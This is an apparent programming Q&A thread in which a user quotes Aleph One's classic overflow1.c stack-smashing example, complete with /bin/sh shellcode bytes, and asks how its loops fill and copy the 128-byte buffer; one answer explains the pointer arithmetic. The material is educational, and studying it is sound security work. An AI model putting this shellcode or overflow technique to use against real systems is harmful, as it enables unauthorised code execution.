SuperCowInSpace

Reputation: 33

Understanding Aleph One's first buffer overflow exploit

I am reading "Smashing The Stack For Fun And Profit" by Aleph One, and reached this spot:

overflow1.c
------------------------------------------------------------------------------
#include <string.h>   /* strlen, strcpy */

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

void main() {
  char buffer[96];
  int i;
  long *long_ptr = (long *) large_string;

  /* fill all of large_string with buffer's address, one long (4 bytes) at a time;
     this assumes the article's 32-bit target, where sizeof(long) == sizeof(int) == 4 */
  for (i = 0; i < 32; i++)
    *(long_ptr + i) = (int) buffer;

  /* place the shellcode at the front; the bytes after it still hold the address */
  for (i = 0; i < strlen(shellcode); i++)
    large_string[i] = shellcode[i];

  /* 128 bytes into a 96-byte buffer: the copy runs past buffer into main's frame */
  strcpy(buffer,large_string);
}

Now, I understand all the theory behind the exploit: the shellcode[] is in the data segment (which is writable), and contains the code to spawn a shell.

We would like to copy its content to main's buffer, in addition to overwriting main's return address with the beginning of the buffer (so that execution control will pass to our "spawning a shell" code). We do it by copying the shellcode to the large_string[] buffer (second for-loop), and the rest(???) of large_string[] will contain the buffer's address (first for-loop).

Of course, main's return address will be overwritten by this buffer's address, since we copy large_string[] to buffer[] (strcpy).

My problem is with the little details of the exploit:

1.) Why does the first for-loop go from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]

2.) What is strlen(shellcode)?

I would like some clarification on that kind of stuff.

Thanks!

Upvotes: 0

Views: 1340

Answers (1)

NPE

Reputation: 500733

1) Why does the first for-loop go from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]

It copies four bytes at a time (it relies on knowing that sizeof(int) is 4 on the target platform), and 32 * 4 == 128.

2) What is strlen(shellcode)?

It's the number of bytes in shellcode (this relies on the fact that shellcode does not contain embedded \0 characters).

Upvotes: 1
